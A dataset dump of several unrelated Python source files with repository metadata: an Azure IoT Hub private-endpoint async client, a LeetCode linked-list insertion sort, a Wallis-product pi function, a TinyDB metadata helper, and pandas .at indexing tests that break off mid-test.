] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 27,952 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_delete_request,
build_get_request,
build_list_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.iothub.v2021_03_03_preview.aio.IotHubClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def list(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> List[_models.PrivateEndpointConnection]:
"""List private endpoint connections.
List private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of PrivateEndpointConnection or the result of cls(response)
:rtype: list[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[List[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("[PrivateEndpointConnection]", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _update_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> _models.PrivateEndpointConnection:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(private_endpoint_connection, (IO, bytes)):
_content = private_endpoint_connection
else:
_json = self._serialize.body(private_endpoint_connection, "PrivateEndpointConnection")
request = build_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: _models.PrivateEndpointConnection,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties. Is
either a PrivateEndpointConnection type or a IO type. Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _delete_initial(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> Optional[_models.PrivateEndpointConnection]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[Optional[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Delete private endpoint connection.
Delete private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
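# Example (an illustrative sketch, not part of the generated client; the client
# class and the credential type are assumptions based on the package docs):
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.iothub.v2021_03_03_preview.aio import IotHubClient
#
#   async with IotHubClient(DefaultAzureCredential(), subscription_id) as client:
#       connections = await client.private_endpoint_connections.list(
#           resource_group_name="my-rg", resource_name="my-hub")
#       poller = await client.private_endpoint_connections.begin_delete(
#           "my-rg", "my-hub", connections[0].name)
#       await poller.result()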
| [
"[email protected]"
] | |
10bcb6a6cca24a31397972415ea766cbddfa555c | 523f8f5febbbfeb6d42183f2bbeebc36f98eadb5 | /147_best.py | 3d1e8b37f5da10cd271490da0e35045823c72455 | [] | no_license | saleed/LeetCode | 655f82fdfcc3000400f49388e97fc0560f356af0 | 48b43999fb7e2ed82d922e1f64ac76f8fabe4baa | refs/heads/master | 2022-06-15T21:54:56.223204 | 2022-05-09T14:05:50 | 2022-05-09T14:05:50 | 209,430,056 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution(object):
def insertionSortList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head==None:
return None
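        # Insertion sort on a linked list: `l` is a dummy head for the sorted
        # part; for each node `p` of the input, scan `q` from the dummy head to
        # find the insertion point, then splice `p` in after `q`.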
l=ListNode(0)
p=head
while p!=None:
q=l
while q.next!=None and q.next.val<p.val :
q=q.next
np=p.next
p.next=q.next
q.next=p
p=np
return l.next
| [
"[email protected]"
] | |
ffbba23a3c4c45c2d06645337aa75f9d54d24f4c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_243/ch161_2020_06_15_19_33_27_198209.py | f921b1b82956792ae479cd3fccf38b2e9021b5f4 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | def PiWallis(num):
numerador=1
denominador=2
i=0
multi = 1
while i < num:
multi *= numerador/denominador
if i%2 == 0:
denominador += 2
else:
numerador += 2
i+=1
return multi | [
"[email protected]"
] | |
17443d48e14b9c51e3399739df9833c81a42bef8 | 886436fe7993aa2913e339ebe70b0eddfacac44c | /build/lib/armin/api/share/utils.py | e68eddb20a572579f23515d616640d6bb6bc3c91 | [] | no_license | singajeet/armin | 581793cac1ac3b1ab638d274b356965ee5d76750 | 99f61a0ce0f2d5c587002ddf8d2843e83d9538d3 | refs/heads/master | 2021-04-28T07:15:42.509397 | 2018-03-19T17:30:09 | 2018-03-19T17:30:09 | 122,219,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | """
.. module:: source_driver
:platform: Unix, Windows
:synopsis: A default implementation of source system driver
"""
from typing import Type, Dict, Any
import pathlib
from armin.api.share.constants import N, F, V
from tinydb import TinyDB, Query
def get_meta_table(meta_repo_details:Type[Dict]):
"""Returns the table from meta repo based on details passed as args
"""
__db_path = meta_repo_details[N.DB_URI]
if __db_path.find('~') >= 0:
__db_path = pathlib.Path(__db_path).expanduser()
else:
__db_path = pathlib.Path(__db_path).absolute()
__meta_db = TinyDB(__db_path)
if __meta_db is None:
return (F.FAILED, 'Unable to create instance of TinyDB')
__source_sys_meta_table = __meta_db\
.table(meta_repo_details[N.META_TABLE])
if __source_sys_meta_table is None:
return (F.FAILED, 'Inconsistent meta repo. Can not find source\
system details table - %s' % meta_repo_details[N.META_TABLE])
else:
return (F.SUCCESS, __source_sys_meta_table)
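# Example (an illustrative sketch; the constant names come from
# armin.api.share.constants and the dict layout is an assumption based on the
# lookups above):
#
#   details = {N.DB_URI: '~/armin/meta.json', N.META_TABLE: 'source_systems'}
#   status, table = get_meta_table(details)
#   if status == F.SUCCESS:
#       status, record = connect_to_meta(details, name='my_source_system')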
def connect_to_meta(meta_repo_details:Type[Dict], name:str) -> (Type[F], Any):
"""Connect to metadata database using the details provided asparameters in the constructor
Args:
meta_repo_details (Dict): Repository details for making connection and query
name (str): Name of the item that needs to be queried
Returns:
status (Tuple): Returns flag Success or Failed and details in case of failure and table record in case of success
"""
__record = None
(status, result_obj) = get_meta_table(meta_repo_details)
if status == F.SUCCESS:
__source_sys_meta_table = result_obj
__record = __source_sys_meta_table\
.get(Query()[N.NAME] == name)
else:
return (status, result_obj)
if __record is not None:
return (F.SUCCESS, __record)
return (F.FAILED, 'Record not found in meta repo')
| [
"[email protected]"
] | |
44ad04a59f6f8b2df27bfda02eaab12a2aa8d256 | 06a045819cf99c7059afde40dca12cf9d3eb5f81 | /pandas/tests/indexing/test_at.py | 01315647c464b7573433bf36515371ffed05e411 | [
"BSD-3-Clause"
] | permissive | MarcoGorelli/pandas | b9882c6ac1e4bc753819b7bc7c8b567964efd275 | 86a4ee01c7899ef454d35b95cde11e9593921c9d | refs/heads/main | 2023-08-22T12:35:45.122152 | 2023-05-04T22:11:07 | 2023-05-04T22:11:07 | 164,618,359 | 4 | 1 | BSD-3-Clause | 2023-05-05T09:02:23 | 2019-01-08T09:55:54 | Python | UTF-8 | Python | false | false | 7,983 | py | from datetime import (
datetime,
timezone,
)
import numpy as np
import pytest
from pandas.errors import InvalidIndexError
from pandas import (
CategoricalDtype,
CategoricalIndex,
DataFrame,
DatetimeIndex,
MultiIndex,
Series,
Timestamp,
)
import pandas._testing as tm
def test_at_timezone():
# https://github.com/pandas-dev/pandas/issues/33544
result = DataFrame({"foo": [datetime(2000, 1, 1)]})
result.at[0, "foo"] = datetime(2000, 1, 2, tzinfo=timezone.utc)
expected = DataFrame(
{"foo": [datetime(2000, 1, 2, tzinfo=timezone.utc)]}, dtype=object
)
tm.assert_frame_equal(result, expected)
def test_selection_methods_of_assigned_col():
# GH 29282
df = DataFrame(data={"a": [1, 2, 3], "b": [4, 5, 6]})
df2 = DataFrame(data={"c": [7, 8, 9]}, index=[2, 1, 0])
df["c"] = df2["c"]
df.at[1, "c"] = 11
result = df
expected = DataFrame({"a": [1, 2, 3], "b": [4, 5, 6], "c": [9, 11, 7]})
tm.assert_frame_equal(result, expected)
result = df.at[1, "c"]
assert result == 11
result = df["c"]
expected = Series([9, 11, 7], name="c")
tm.assert_series_equal(result, expected)
result = df[["c"]]
expected = DataFrame({"c": [9, 11, 7]})
tm.assert_frame_equal(result, expected)
class TestAtSetItem:
def test_at_setitem_item_cache_cleared(self):
# GH#22372 Note the multi-step construction is necessary to trigger
# the original bug. pandas/issues/22372#issuecomment-413345309
df = DataFrame(index=[0])
df["x"] = 1
df["cost"] = 2
# accessing df["cost"] adds "cost" to the _item_cache
df["cost"]
# This loc[[0]] lookup used to call _consolidate_inplace at the
# BlockManager level, which failed to clear the _item_cache
df.loc[[0]]
df.at[0, "x"] = 4
df.at[0, "cost"] = 789
expected = DataFrame({"x": [4], "cost": 789}, index=[0])
tm.assert_frame_equal(df, expected)
# And in particular, check that the _item_cache has updated correctly.
tm.assert_series_equal(df["cost"], expected["cost"])
def test_at_setitem_mixed_index_assignment(self):
# GH#19860
ser = Series([1, 2, 3, 4, 5], index=["a", "b", "c", 1, 2])
ser.at["a"] = 11
assert ser.iat[0] == 11
ser.at[1] = 22
assert ser.iat[3] == 22
def test_at_setitem_categorical_missing(self):
df = DataFrame(
index=range(3), columns=range(3), dtype=CategoricalDtype(["foo", "bar"])
)
df.at[1, 1] = "foo"
expected = DataFrame(
[
[np.nan, np.nan, np.nan],
[np.nan, "foo", np.nan],
[np.nan, np.nan, np.nan],
],
dtype=CategoricalDtype(["foo", "bar"]),
)
tm.assert_frame_equal(df, expected)
def test_at_setitem_multiindex(self):
df = DataFrame(
np.zeros((3, 2), dtype="int64"),
columns=MultiIndex.from_tuples([("a", 0), ("a", 1)]),
)
df.at[0, "a"] = 10
expected = DataFrame(
[[10, 10], [0, 0], [0, 0]],
columns=MultiIndex.from_tuples([("a", 0), ("a", 1)]),
)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("row", (Timestamp("2019-01-01"), "2019-01-01"))
def test_at_datetime_index(self, row):
# Set float64 dtype to avoid upcast when setting .5
df = DataFrame(
data=[[1] * 2], index=DatetimeIndex(data=["2019-01-01", "2019-01-02"])
).astype({0: "float64"})
expected = DataFrame(
data=[[0.5, 1], [1.0, 1]],
index=DatetimeIndex(data=["2019-01-01", "2019-01-02"]),
)
df.at[row, 0] = 0.5
tm.assert_frame_equal(df, expected)
class TestAtSetItemWithExpansion:
def test_at_setitem_expansion_series_dt64tz_value(self, tz_naive_fixture):
# GH#25506
ts = Timestamp("2017-08-05 00:00:00+0100", tz=tz_naive_fixture)
result = Series(ts)
result.at[1] = ts
expected = Series([ts, ts])
tm.assert_series_equal(result, expected)
class TestAtWithDuplicates:
def test_at_with_duplicate_axes_requires_scalar_lookup(self):
# GH#33041 check that falling back to loc doesn't allow non-scalar
# args to slip in
arr = np.random.randn(6).reshape(3, 2)
df = DataFrame(arr, columns=["A", "A"])
msg = "Invalid call for scalar access"
with pytest.raises(ValueError, match=msg):
df.at[[1, 2]]
with pytest.raises(ValueError, match=msg):
df.at[1, ["A"]]
with pytest.raises(ValueError, match=msg):
df.at[:, "A"]
with pytest.raises(ValueError, match=msg):
df.at[[1, 2]] = 1
with pytest.raises(ValueError, match=msg):
df.at[1, ["A"]] = 1
with pytest.raises(ValueError, match=msg):
df.at[:, "A"] = 1
class TestAtErrors:
# TODO: De-duplicate/parametrize
# test_at_series_raises_key_error2, test_at_frame_raises_key_error2
def test_at_series_raises_key_error(self, indexer_al):
# GH#31724 .at should match .loc
ser = Series([1, 2, 3], index=[3, 2, 1])
result = indexer_al(ser)[1]
assert result == 3
with pytest.raises(KeyError, match="a"):
indexer_al(ser)["a"]
def test_at_frame_raises_key_error(self, indexer_al):
# GH#31724 .at should match .loc
df = DataFrame({0: [1, 2, 3]}, index=[3, 2, 1])
result = indexer_al(df)[1, 0]
assert result == 3
with pytest.raises(KeyError, match="a"):
indexer_al(df)["a", 0]
with pytest.raises(KeyError, match="a"):
indexer_al(df)[1, "a"]
def test_at_series_raises_key_error2(self, indexer_al):
# at should not fallback
# GH#7814
# GH#31724 .at should match .loc
ser = Series([1, 2, 3], index=list("abc"))
result = indexer_al(ser)["a"]
assert result == 1
with pytest.raises(KeyError, match="^0$"):
indexer_al(ser)[0]
def test_at_frame_raises_key_error2(self, indexer_al):
# GH#31724 .at should match .loc
df = DataFrame({"A": [1, 2, 3]}, index=list("abc"))
